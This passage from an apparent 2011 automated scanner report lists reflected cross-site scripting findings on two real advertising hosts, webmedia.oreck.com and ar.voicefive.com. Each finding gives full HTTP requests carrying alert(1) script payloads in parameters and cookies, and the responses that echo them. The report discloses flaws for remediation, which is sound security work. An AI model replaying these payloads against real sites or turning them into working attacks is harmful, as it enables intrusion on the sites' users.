function Measure_this(EV) { var img = new Image(); img.src = "http://webmedia.oreck.com/image_htmlping?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611 ...[SNIP]... -%253A%2522%2522&ml_pbi=-2112034&ml_camp=1088660&ml_crid=2142475&ml_multiclick=clickTAG1&click=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href=7d8ba'-alert(1)-'162898ef1f3http://www.oreck.com/Oreck-Graphite-Vacuum-Cleaner?keycode=DS544&ban=Graphite&cstruid=1088660_1113699_2037848_2112034_1119611_2142475') + '&clickTAG2=' + escape('http://webmedia.oreck.com/click.ng?spa ...[SNIP]...
|
5.67. http://webmedia.oreck.com/cookE/geoip/iframe [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://webmedia.oreck.com |
| Path: |
/cookE/geoip/iframe |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e741d"><script>alert(1)</script>b7e5f4284bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cookE/geoip/iframe?spacedesc=2112034_1113699_180x150_2037848_2112034&target=_blank&@CPSC@=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href=&e741d"><script>alert(1)</script>b7e5f4284bb=1 HTTP/1.1 Host: webmedia.oreck.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=CP49AO&cb=404881879 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:06:34 GMT Server: Apache Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://webmedia.oreck.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=11-676885560; expires=Tue, 17 Sep 2013 01:06:34 GMT; path=/; domain=.oreck.com Set-Cookie: CSList=1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699; expires=Fri, 16 Dec 2011 13:06:34 GMT; path=/; domain=.oreck.com x_transtrans: 14.6.10.688 Content-Type: text/html Content-Length: 5520 Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://webmedia.oreck.com/image_htmlping?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611 ...[SNIP]... 34&af=1119611&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2112034&ml_camp=1088660&ml_crid=2142475&click=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href=&e741d"><script>alert(1)</script>b7e5f4284bb=1http://www.oreck.com/Oreck-Graphite-Vacuum-Cleaner?keycode=DS544&ban=Graphite&cstruid=1088660_1113699_2037848_2112034_1119611_2142475"> ...[SNIP]...
|
5.68. http://webmedia.oreck.com/cookE/geoip/iframe [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://webmedia.oreck.com |
| Path: |
/cookE/geoip/iframe |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e011d'-alert(1)-'816dd40d976 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cookE/geoip/iframe?spacedesc=2112034_1113699_180x150_2037848_2112034&target=_blank&@CPSC@=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href=&e011d'-alert(1)-'816dd40d976=1 HTTP/1.1 Host: webmedia.oreck.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=CP49AO&cb=404881879 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:06:35 GMT Server: Apache Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://webmedia.oreck.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=11-676885560; expires=Tue, 17 Sep 2013 01:06:35 GMT; path=/; domain=.oreck.com Set-Cookie: CSList=1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699; expires=Fri, 16 Dec 2011 13:06:35 GMT; path=/; domain=.oreck.com x_transtrans: .6.10.688 Content-Type: text/html Content-Length: 5445 Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://webmedia.oreck.com/image_htmlping?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611 ...[SNIP]... %253A%2522%2522&ml_pbi=-2112034&ml_camp=1088660&ml_crid=2142475&ml_multiclick=clickTAG1&click=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href=&e011d'-alert(1)-'816dd40d976=1http://www.oreck.com/Oreck-Graphite-Vacuum-Cleaner?keycode=DS544&ban=Graphite&cstruid=1088660_1113699_2037848_2112034_1119611_2142475') + '&clickTAG2=' + escape('http://webmedia.oreck.com/click.ng?s ...[SNIP]...
|
5.69. http://webmedia.oreck.com/cookE/geoip/iframe [target parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://webmedia.oreck.com |
| Path: |
/cookE/geoip/iframe |
Issue detail
The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ccbb"><script>alert(1)</script>88c8787917c was submitted in the target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cookE/geoip/iframe?spacedesc=2112034_1113699_180x150_2037848_2112034&target=_blank1ccbb"><script>alert(1)</script>88c8787917c&@CPSC@=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href= HTTP/1.1 Host: webmedia.oreck.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=CP49AO&cb=404881879 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:06:33 GMT Server: Apache Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://webmedia.oreck.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=11-676885560; expires=Tue, 17 Sep 2013 01:06:33 GMT; path=/; domain=.oreck.com Set-Cookie: CSList=1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699; expires=Fri, 16 Dec 2011 13:06:33 GMT; path=/; domain=.oreck.com x_transtrans: 10.6.10.688 Content-Type: text/html Content-Length: 5419 Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://webmedia.oreck.com/image_htmlping?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611 ...[SNIP]... <A TARGET="_blank1ccbb"><script>alert(1)</script>88c8787917c" HREF="http://webmedia.oreck.com/click.ng?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2112034&ml_camp=1088660&ml_crid=2142475&click=http://clk.atdmt. ...[SNIP]...
|
5.70. http://webmedia.oreck.com/cookE/geoip/iframe [target parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://webmedia.oreck.com |
| Path: |
/cookE/geoip/iframe |
Issue detail
The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89b81'%3balert(1)//614f7906e54 was submitted in the target parameter. This input was echoed as 89b81';alert(1)//614f7906e54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cookE/geoip/iframe?spacedesc=2112034_1113699_180x150_2037848_2112034&target=_blank89b81'%3balert(1)//614f7906e54&@CPSC@=http://clk.atdmt.com/go/msnnkdrv0010001658apm/direct;wi.180;hi.150;01;ai.234564869.234602079;ct.1/01?href= HTTP/1.1 Host: webmedia.oreck.com Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=CP49AO&cb=404881879 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:06:33 GMT Server: Apache Cache-Control: no-cache, must-revalidate Expires: Tue, 1 Jan 1970 01:01:01 GMT Pragma: no-cache P3P: policyref="http://webmedia.oreck.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI" Set-Cookie: PrefID=11-676885560; expires=Tue, 17 Sep 2013 01:06:33 GMT; path=/; domain=.oreck.com Set-Cookie: CSList=1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699,1088660/1113699; expires=Fri, 16 Dec 2011 13:06:33 GMT; path=/; domain=.oreck.com x_transtrans: 14.6.10.688 Content-Type: text/html Content-Length: 5374 Connection: close
<SCRIPT LANGUAGE="JavaScript">
function Measure_this(EV) { var img = new Image(); img.src = "http://webmedia.oreck.com/image_htmlping?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611 ...[SNIP]... OD/18369/creatives/Graphite_180x150.dir/graphite_180x150.swf'; var flash_name= '"' + swf_name + '"'; var swfVer= 100/10; var swfMime= 'application/x-shockwave-flash'; var clickTAGs= 'clickTARGET=_blank89b81';alert(1)//614f7906e54' + '&clickTAG1=' + escape('http://webmedia.oreck.com/click.ng?spacedesc=2112034_1113699_180x150_2037848_2112034&af=1119611&ml_pkgkw=-%253A%2522%2522&ml_pbi=-2112034&ml_camp=1088660&ml_crid=2142475&ml_ ...[SNIP]...
|
5.71. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 47239<script>alert(1)</script>3fda164fbc8 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=169413070&PG=DLSRD1&ASID=d97db84998f14df1adc268fef31dc64c&destination=;ord=169413070? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=1&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:03:59 2011&prad=65659550&arc=42804711&; BMX_3PC=147239<script>alert(1)</script>3fda164fbc8; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 14:04:51 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p108883753=exp=4&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 14:04:51 2011&8f90f<script>alert(1)</script>d84fff57e96=&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 14:04:51 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 30574
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C ...[SNIP]... MX_G]]>>": 'method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C', ">": 'exp=1&initExp=Sat Sep 17 13:09:12 2011&recExp=Sat Sep 17 13:09:12 2011&prad=65659550&arc=42804711&', "BMX_3PC": '147239<script>alert(1)</script>3fda164fbc8', "sn": 'exp=5&initExp=Sat Sep 17 13:09:11 2011&recExp=Sat Sep 17 13:09:12 2011&prad=65659550&arc=42804711&', "BMX_BR": 'pid=p109848095&prad=70982068&arc=43901049&exp=1316221073', "ar_8a7a0 774a29 ...[SNIP]...
|
5.72. http://ar.voicefive.com/bmx3/broker.pli [BMX_BR cookie]
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The value of the BMX_BR cookie is copied into the HTML document as plain text between tags. The payload d388f<script>alert(1)</script>a202127003c was submitted in the BMX_BR cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073d388f<script>alert(1)</script>a202127003c; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 13:09:26 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p108883753=exp=111&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:09:26 2011&89dd4824e76d962d053637de=1&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:26 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 29438
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C ...[SNIP]... 711&', "BMX_3PC": '1', "sn": 'exp=5&initExp=Sat Sep 17 13:09:11 2011&recExp=Sat Sep 17 13:09:12 2011&prad=65659550&arc=42804711&', "BMX_BR": 'pid=p109848095&prad=70982068&arc=43901049&exp=1316221073d388f<script>alert(1)</script>a202127003c', "ar_8a7a0 774a29ac478": 'exp=1&initExp=Sat Sep 17 13:09:10 2011&recExp=Sat Sep 17 13:09:10 2011&prad=65659550&arc=42804711&', "ar_p108883753'": 'exp=1&initExp=Sat Sep 17 13:09:11 2011&recExp=Sat ...[SNIP]...
|
5.73. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 1791d<script>alert(1)</script>6e2ddd05fd was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=169413070&PG=DLSRD1&ASID=d97db84998f14df1adc268fef31dc64c&destination=;ord=169413070? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=1&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:03:59 2011&prad=65659550&arc=42804711&; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C1791d<script>alert(1)</script>6e2ddd05fd
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 14:04:52 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p108883753=exp=8&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 14:04:52 2011&8f90f<script>alert(1)</script>d84fff57e96=&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 14:04:52 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 30573
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C ...[SNIP]... C', "ar_p110620504": 'exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1316264640%2E321%2Cwait%2D%3E10000%2C1791d<script>alert(1)</script>6e2ddd05fd', "ar_p109848095": 'exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&', "89dd48246a33298449bdf87": 'method%2D%3E%2D1%2Cts%2D%3E1316267468%2E354%2Cwai ...[SNIP]...
|
5.74. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload fff61<script>alert(1)</script>4c70c1be1d was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p108883753&PRAd=65659550&AR_C=42804711 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N763.MicrosoftMediaNetwork/B5634534.12;sz=728x90;;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00050/107000000000056488.1?!&&PID=8798816&UIT=G-&TargetID=52980966&AN=1376324361&PG=DLSRR1&ASID=d3af6362ac6e4a25944cc785a16bf745&destination=;ord=1376324361? User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; BMX_BR=pid=p109848095&prad=70982068&arc=43901049&exp=1316221073; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; UID=9cc29993-80.67.74.150-1314836282fff61<script>alert(1)</script>4c70c1be1d
|
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 17 Sep 2011 13:09:29 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p108883753=exp=125&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:09:29 2011&89dd4824e76d962d053637de=1&prad=65659550&arc=42804711&; expires=Fri 16-Dec-2011 13:09:29 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 29433
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"65659550",Pid:"p108883753",Arc:"42804711",Location:C ...[SNIP]... 011&prad=70982068&arc=43901049&', "ar_p90175839": 'exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&', "UID": '9cc29993-80.67.74.150-1314836282fff61<script>alert(1)</script>4c70c1be1d', "> ...[SNIP]...
|
5.75. http://ar.voicefive.com/bmx3/broker.pli [ar_p107223597 cookie]
previous
next
Summary
| Severity: |
Information |
| Confidence: |
Certain |
| Host: |
http://ar.voicefive.com |
| Path: |
/bmx3/broker.pli |
Issue detail
The value of the ar_p107223597 cookie is copied into the HTML document as plain text between tags. The payload d1b6c<script>alert(1)</script>da4afe07d09 was submitted in the ar_p107223597 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
